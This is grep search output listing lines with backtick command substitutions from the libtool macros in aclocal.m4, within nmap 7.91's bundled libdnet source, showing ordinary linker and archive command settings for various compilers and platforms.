nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4390:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='${wl}--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4391-	  tmp_addflag=' $pic_flag'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4393-	pgf77* | pgf90* | pgf95*)	# Portland Group f77 and f90 compilers
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4394:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='${wl}--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4395-	  tmp_addflag=' $pic_flag -Mnomain' ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4408-	esac
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4409:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4410-	*Sun\ C*)			# Sun C 5.9
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4411:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='${wl}--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4412-	  _LT_TAGVAR(compiler_needs_object, $1)=yes
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4477-    sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4478:      case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4479-        *\ [[01]].* | *\ 2.[[0-9]].* | *\ 2.1[[0-5]].*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4598-	# below for broken collect2 doesn't work under 4.3+
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4599:	  collect2name=`${CC} -print-prog-name=collect2`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4600-	  if test -f "$collect2name" &&
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4647-        _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='${wl}-blibpath:$libdir:'"$aix_libpath"
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4648:        _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -o $output_objdir/$soname $libobjs $deplibs '"\${wl}$no_entry_flag"' $compiler_flags `if test "x${allow_undefined_flag}" != "x"; then $ECHO "X${wl}${allow_undefined_flag}" | $Xsed; else :; fi` '"\${wl}$exp_sym_flag:\$export_symbols $shared_flag"
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4649-      else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4702-      # FIXME: Setting linknames here is a bad hack.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4703:      _LT_TAGVAR(archive_cmds, $1)='$CC -o $lib $libobjs $compiler_flags `$ECHO "X$deplibs" | $Xsed -e '\''s/ -lc$//'\''` -link -dll~linknames='
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4704-      # The linker will automatically build a .lib file if we build a DLL.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4707-      _LT_TAGVAR(old_archive_cmds, $1)='lib -OUT:$oldlib$oldobjs$old_deplibs'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4708:      _LT_TAGVAR(fix_srcfile_path, $1)='`cygpath -w "$srcfile"`'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4709-      _LT_TAGVAR(enable_shared_with_static_runtimes, $1)=yes
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4837-      if test "$GCC" = yes; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4838:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared $libobjs $deplibs $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4839-	# Try to use the -exported_symbol ld option, if it does not
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4844-        AC_LINK_IFELSE(int foo(void) {},
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4845:          _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -shared $libobjs $deplibs $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations ${wl}-exports_file ${wl}$export_symbols -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4846-        )
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4848-      else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4849:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4850:	_LT_TAGVAR(archive_expsym_cmds, $1)='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -exports_file $export_symbols -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4851-      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4885-	_LT_TAGVAR(hardcode_direct_absolute, $1)=yes
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4886:	if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4887-	  _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4918-	_LT_TAGVAR(allow_undefined_flag, $1)=' ${wl}-expect_unresolved ${wl}\*'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4919:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4920-      else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4921-	_LT_TAGVAR(allow_undefined_flag, $1)=' -expect_unresolved \*'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4922:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4923-      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4931-	_LT_TAGVAR(allow_undefined_flag, $1)=' ${wl}-expect_unresolved ${wl}\*'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4932:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags ${wl}-msym ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4933-	_LT_TAGVAR(hardcode_libdir_flag_spec, $1)='${wl}-rpath ${wl}$libdir'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4935-	_LT_TAGVAR(allow_undefined_flag, $1)=' -expect_unresolved \*'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4936:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared${allow_undefined_flag} $libobjs $deplibs $compiler_flags -msym -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4937:	_LT_TAGVAR(archive_expsym_cmds, $1)='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done; printf "%s\\n" "-hidden">> $lib.exp~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4938:	$CC -shared${allow_undefined_flag} ${wl}-input ${wl}$lib.exp $compiler_flags $libobjs $deplibs -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib~$RM $lib.exp'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4939-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4954-      else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4955:	case `$CC -V 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4956-	*"Compilers 5.0"*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5146-        _LT_TAGVAR(allow_undefined_flag, $1)=
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5147:        if AC_TRY_EVAL(_LT_TAGVAR(archive_cmds, $1) 2\>\&1 \| $GREP \" -lc \" \>/dev/null 2\>\&1)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5148-        then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5456-        # ancient GNU ld didn't support --whole-archive et. al.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5457:        if eval "`$CC -print-prog-name=ld` --help 2>&1" |
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5458-	  $GREP 'no-whole-archive' > /dev/null; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5539-          # below for broken collect2 doesn't work under 4.3+
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5540:	  collect2name=`${CC} -print-prog-name=collect2`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5541-	  if test -f "$collect2name" &&
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5589-
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5590:          _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -o $output_objdir/$soname $libobjs $deplibs '"\${wl}$no_entry_flag"' $compiler_flags `if test "x${allow_undefined_flag}" != "x"; then $ECHO "X${wl}${allow_undefined_flag}" | $Xsed; else :; fi` '"\${wl}$exp_sym_flag:\$export_symbols $shared_flag"
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5591-        else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5646-          # is EXPORTS), use it as is; otherwise, prepend...
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5647:          _LT_TAGVAR(archive_expsym_cmds, $1)='if test "x`$SED 1q $export_symbols`" = xEXPORTS; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5648-	    cp $export_symbols $output_objdir/$soname.def;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5722-            # dependencies.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5723:            output_verbose_link_cmd='templist=`($CC -b $CFLAGS -v conftest.$objext 2>&1) | $EGREP "\-L"`; list=""; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; $ECHO "X$list" | $Xsed'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5724-            ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5787-	    # dependencies.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5788:	    output_verbose_link_cmd='templist=`($CC -b $CFLAGS -v conftest.$objext 2>&1) | $GREP "\-L"`; list=""; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; $ECHO "X$list" | $Xsed'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5789-	    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5823-	# time.  Moving up from 0x10000000 also allows more sbrk(2) space.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5824:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags ${wl}-h,$soname ${wl}--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5825:	_LT_TAGVAR(archive_expsym_cmds, $1)='sed "s,^,_," $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags ${wl}-h,$soname ${wl}--retain-symbols-file,$output_objdir/$soname.expsym ${wl}--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5826-	;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5830-	    # SGI C++
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5831:	    _LT_TAGVAR(archive_cmds, $1)='$CC -shared -all -multigot $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5832-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5841-	      if test "$with_gnu_ld" = no; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5842:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5843-	      else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5844:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5845-	      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5862-	    # to its proper name (with version) after linking.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5863:	    _LT_TAGVAR(archive_cmds, $1)='tempext=`echo $shared_ext | $SED -e '\''s/\([[^()0-9A-Za-z{}]]\)/\\\\\1/g'\''`; templib=`echo $lib | $SED -e "s/\${tempext}\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib; mv \$templib $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5864:	    _LT_TAGVAR(archive_expsym_cmds, $1)='tempext=`echo $shared_ext | $SED -e '\''s/\([[^()0-9A-Za-z{}]]\)/\\\\\1/g'\''`; templib=`echo $lib | $SED -e "s/\${tempext}\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib ${wl}-retain-symbols-file,$export_symbols; mv \$templib $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5865-	    # Commands to make compiler produce verbose output that lists
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5872-	    # dependencies.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5873:	    output_verbose_link_cmd='templist=`$CC $CFLAGS -v conftest.$objext -o libconftest$shared_ext 2>&1 | $GREP "ld"`; rm -f libconftest$shared_ext; list=""; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; $ECHO "X$list" | $Xsed'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5874-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5887-	    # earlier do not add the objects themselves.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5888:	    case `$CC -V 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5889-	      *"Version 7."*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5908-            # Portland Group C++ compiler
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5909:	    case `$CC -V` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5910-	    *pgCC\ [[1-5]]* | *pgcpp\ [[1-5]]*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5913-		$CC --prelink_objects --instantiation_dir $tpldir $objs $libobjs $compile_deplibs~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5914:		compile_command="$compile_command `find $tpldir -name \*.o | $NL2SP`"'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5915-	      _LT_TAGVAR(old_archive_cmds, $1)='tpldir=Template.dir~
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5917-		$CC --prelink_objects --instantiation_dir $tpldir $oldobjs$old_deplibs~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5918:		$AR $AR_FLAGS $oldlib$oldobjs$old_deplibs `find $tpldir -name \*.o | $NL2SP`~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5919-		$RANLIB $oldlib'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5922-		$CC --prelink_objects --instantiation_dir $tpldir $predep_objects $libobjs $deplibs $convenience $postdep_objects~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5923:		$CC -shared $pic_flag $predep_objects $libobjs $deplibs `find $tpldir -name \*.o | $NL2SP` $postdep_objects $compiler_flags ${wl}-soname ${wl}$soname -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5924-	      _LT_TAGVAR(archive_expsym_cmds, $1)='tpldir=Template.dir~
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5926-		$CC --prelink_objects --instantiation_dir $tpldir $predep_objects $libobjs $deplibs $convenience $postdep_objects~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5927:		$CC -shared $pic_flag $predep_objects $libobjs $deplibs `find $tpldir -name \*.o | $NL2SP` $postdep_objects $compiler_flags ${wl}-soname ${wl}$soname ${wl}-retain-symbols-file ${wl}$export_symbols -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5928-	      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5936-	    _LT_TAGVAR(export_dynamic_flag_spec, $1)='${wl}--export-dynamic'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5937:	    _LT_TAGVAR(whole_archive_flag_spec, $1)='${wl}--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5938-            ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5955-	    # dependencies.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5956:	    output_verbose_link_cmd='templist=`$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP "ld"`; templist=`$ECHO "X$templist" | $Xsed -e "s/\(^.*ld.*\)\( .*ld .*$\)/\1/"`; list=""; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; $ECHO "X$list" | $Xsed'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5957-	    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5970-	  *)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5971:	    case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5972-	    *Sun\ C*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5977-	      _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='-R$libdir'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:5978:	      _LT_TAGVAR(whole_archive_flag_spec, $1)='${wl}--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; $ECHO \"$new_convenience\"` ${wl}--no-whole-archive'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-5979-	      _LT_TAGVAR(compiler_needs_object, $1)=yes
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6047-	  _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='${wl}-rpath,$libdir'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6048:	  if test -z "`echo __ELF__ | $CC -E - | grep __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6049-	    _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -shared $pic_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags ${wl}-retain-symbols-file,$export_symbols -o $lib'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6066-	    # to its proper name (with version) after linking.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6067:	    _LT_TAGVAR(archive_cmds, $1)='tempext=`echo $shared_ext | $SED -e '\''s/\([[^()0-9A-Za-z{}]]\)/\\\\\1/g'\''`; templib=`echo "$lib" | $SED -e "s/\${tempext}\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib; mv \$templib $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6068-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6087-	        _LT_TAGVAR(allow_undefined_flag, $1)=' ${wl}-expect_unresolved ${wl}\*'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6088:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared${allow_undefined_flag} $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags ${wl}-soname $soname `test -n "$verstring" && $ECHO "X${wl}-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6089-	        _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='${wl}-rpath ${wl}$libdir'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6092-	        _LT_TAGVAR(allow_undefined_flag, $1)=' -expect_unresolved \*'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6093:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared${allow_undefined_flag} $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -msym -soname $soname `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6094:	        _LT_TAGVAR(archive_expsym_cmds, $1)='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6095-	          echo "-hidden">> $lib.exp~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6096:	          $CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -msym -soname $soname ${wl}-input ${wl}$lib.exp  `test -n "$verstring" && $ECHO "X-set_version $verstring" | $Xsed` -update_registry ${output_objdir}/so_locations -o $lib~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6097-	          $RM $lib.exp'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6111-	    # dependencies.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6112:	    output_verbose_link_cmd='templist=`$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP "ld" | $GREP -v "ld:"`; templist=`$ECHO "X$templist" | $Xsed -e "s/\(^.*ld.*\)\( .*ld.*$\)/\1/"`; list=""; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; $ECHO "X$list" | $Xsed'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6113-	    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6118-	        osf3*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6119:	          _LT_TAGVAR(archive_cmds, $1)='$CC -shared -nostdlib ${allow_undefined_flag} $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "X${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6120-		  ;;
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6121-	        *)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6122:	          _LT_TAGVAR(archive_cmds, $1)='$CC -shared -nostdlib ${allow_undefined_flag} $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags ${wl}-msym ${wl}-soname ${wl}$soname `test -n "$verstring" && $ECHO "${wl}-set_version ${wl}$verstring" | $Xsed` ${wl}-update_registry ${wl}${output_objdir}/so_locations -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6123-		  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6417-
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6418:  for p in `eval "$output_verbose_link_cmd"`; do
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6419-    case $p in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6503-linux*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6504:  case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6505-  *Sun\ C*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6554-if test -n "${_LT_TAGVAR(compiler_lib_search_path, $1)}"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:6555: _LT_TAGVAR(compiler_lib_search_dirs, $1)=`echo " ${_LT_TAGVAR(compiler_lib_search_path, $1)}" | ${SED} -e 's! -L! !g' -e 's!^ !!'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-6556-fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7088-    test $lt_ac_count -gt 10 && break
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7089:    lt_ac_count=`expr $lt_ac_count + 1`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7090-    if test $lt_ac_count -gt $lt_ac_max; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7263-  # Extract subdirectory from the argument.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7264:  func_dirname_result=`$ECHO "X${1}" | $Xsed -e "$dirname"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7265-  if test "X$func_dirname_result" = "X${1}"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7274-{
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7275:  func_basename_result=`$ECHO "X${1}" | $Xsed -e "$basename"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7276-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7304-{
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7305:  func_opt_split_opt=`$ECHO "X${1}" | $Xsed -e "$my_sed_long_opt"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7306:  func_opt_split_arg=`$ECHO "X${1}" | $Xsed -e "$my_sed_long_arg"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7307-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7311-{
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7312:  func_lo2o_result=`$ECHO "X${1}" | $Xsed -e "$lo2o"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7313-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7317-{
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7318:  func_xform_result=`$ECHO "X${1}" | $Xsed -e 's/\.[[^.]]*$/.lo/'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7319-}
##############################################
